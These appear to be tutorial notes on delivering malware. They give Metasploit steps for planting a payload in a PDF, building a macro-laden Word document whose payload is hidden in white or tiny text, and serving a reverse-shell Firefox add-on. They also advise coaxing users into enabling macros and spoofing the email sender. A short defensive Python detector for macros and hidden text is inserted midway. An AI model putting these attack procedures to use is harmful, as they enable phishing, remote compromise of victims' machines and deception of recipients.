Embedding Malware

Embedding Malware in PDFs

  1. Launch Metasploit
  2. search adobe_pdf
  3. Set the options
    1. set PAYLOAD
    2. set INFILENAME /root/Desktop/syllabus.pdf
    3. set FILENAME bad_syllabus.pdf
    4. set LHOST <IP Address>
    5. exploit
  4. From here you can send the file by email, on a flash drive, etc.

Embedding Malware into a Word Document via Macro

  1. Create a malicious executable
  2. Convert it to a Visual Basic script (macro code)
  3. Create a MS Word document
  4. Start the listener
  5. Open the malicious document
  6. Collect the session

Tool for embedding into a Word document: exe2vba

In Kali, this tool is located in /usr/share/metasploit-framework/tools/exploit

Run the tool: sudo msf-exe2vba <exe (your malicious file)> <VBA (new file to create)>

Now go to the Windows machine and transfer the new VBA file there.

Create new Word document.

Create a macro

  1. View tab
  2. Macros
  3. View Macros
  4. Give it a name
  5. Create

Open the VBA file, copy the macro code part and paste it into the macro code page in Word.

Save changes.

We still have to embed the payload into the document.

Copy the payload data part from the VBA file and paste it into the Word document.

Shrinking the font size makes it look like a regular document. You can also make the text white.

Because macros are disabled by default, you will need to convince the end user to enable them.
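A defender-side check for the two traces this procedure leaves in a document: a VBA project part, and body text hidden by a tiny or white font. This is an added example, not part of the course notes; the sample document it inspects is constructed in memory with placeholder content, and the size threshold and token pattern are assumptions.

```python
"""Flag Word documents carrying a VBA project plus body text hidden by a tiny or
white font. Added example, not from the course; the sample document is constructed."""
import io
import re
import zipfile

TINY_HALF_POINTS = 8  # w:sz is in half-points, so 8 means 4pt or smaller (assumed threshold)

def inspect_docx(data: bytes) -> dict:
    """Return indicators found in an OOXML (.docx/.docm) file given as bytes."""
    findings = {"has_vba": False, "hidden_runs": 0, "long_token_runs": 0}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        findings["has_vba"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        if "word/document.xml" not in names:
            return findings
        xml = zf.read("word/document.xml").decode("utf-8", "replace")
    # Each <w:r> run carries its own formatting, so inspect runs one at a time.
    for run in re.findall(r"<w:r\b.*?</w:r>", xml, flags=re.S):
        white = re.search(r'<w:color[^>]*w:val="[Ff]{6}"', run) is not None
        size = re.search(r'<w:sz[^>]*w:val="(\d+)"', run)
        tiny = size is not None and int(size.group(1)) <= TINY_HALF_POINTS
        text = "".join(re.findall(r"<w:t(?:\s[^>]*)?>(.*?)</w:t>", run, flags=re.S)).strip()
        if text and (white or tiny):
            findings["hidden_runs"] += 1
            # A pasted payload shows up as one long token with no ordinary words.
            if re.fullmatch(r"[A-Za-z0-9+/=,]{64,}", text):
                findings["long_token_runs"] += 1
    return findings

def is_suspicious(findings: dict) -> bool:
    """Macros and hidden text together are the pattern worth alerting on."""
    return findings["has_vba"] and findings["hidden_runs"] > 0

def build_sample(with_vba: bool) -> bytes:
    """Build a minimal in-memory document; the blob is a placeholder, not a payload."""
    blob = "AAAABBBB" * 16  # constructed stand-in for hidden pasted data
    document_xml = (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        "<w:body><w:p><w:r><w:t>Course syllabus, week 1</w:t></w:r></w:p>"
        '<w:p><w:r><w:rPr><w:color w:val="FFFFFF"/><w:sz w:val="2"/></w:rPr>'
        f"<w:t>{blob}</w:t></w:r></w:p></w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", document_xml)
        if with_vba:
            zf.writestr("word/vbaProject.bin", b"constructed placeholder bytes")
    return buf.getvalue()
```

On a real file, read its bytes and pass them to inspect_docx; a document without macros but with hidden text is reported but not flagged, since the combination is what matters here.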


Sending Malware as a Browser Add-on

Another way to compromise a target is to send the malware as a browser add-on.

Metasploit can be used to create this.

  1. Launch the Metasploit framework
  2. search firefox_xpi
  3. use the module
  4. show payloads
  5. use a shell payload with a reverse TCP connection
  6. set SRVHOST: the host on which the web server is started; this is our machine
  7. set SRVPORT: you can use 8080 for this
  8. set URIPATH: this is the URL path the payload is served from
  9. set LHOST
  10. exploit

You can now copy the URL and paste it into the address bar to verify that the server is running.

To send the link by email, you can use YOPMail.com, which lets you spoof the sender.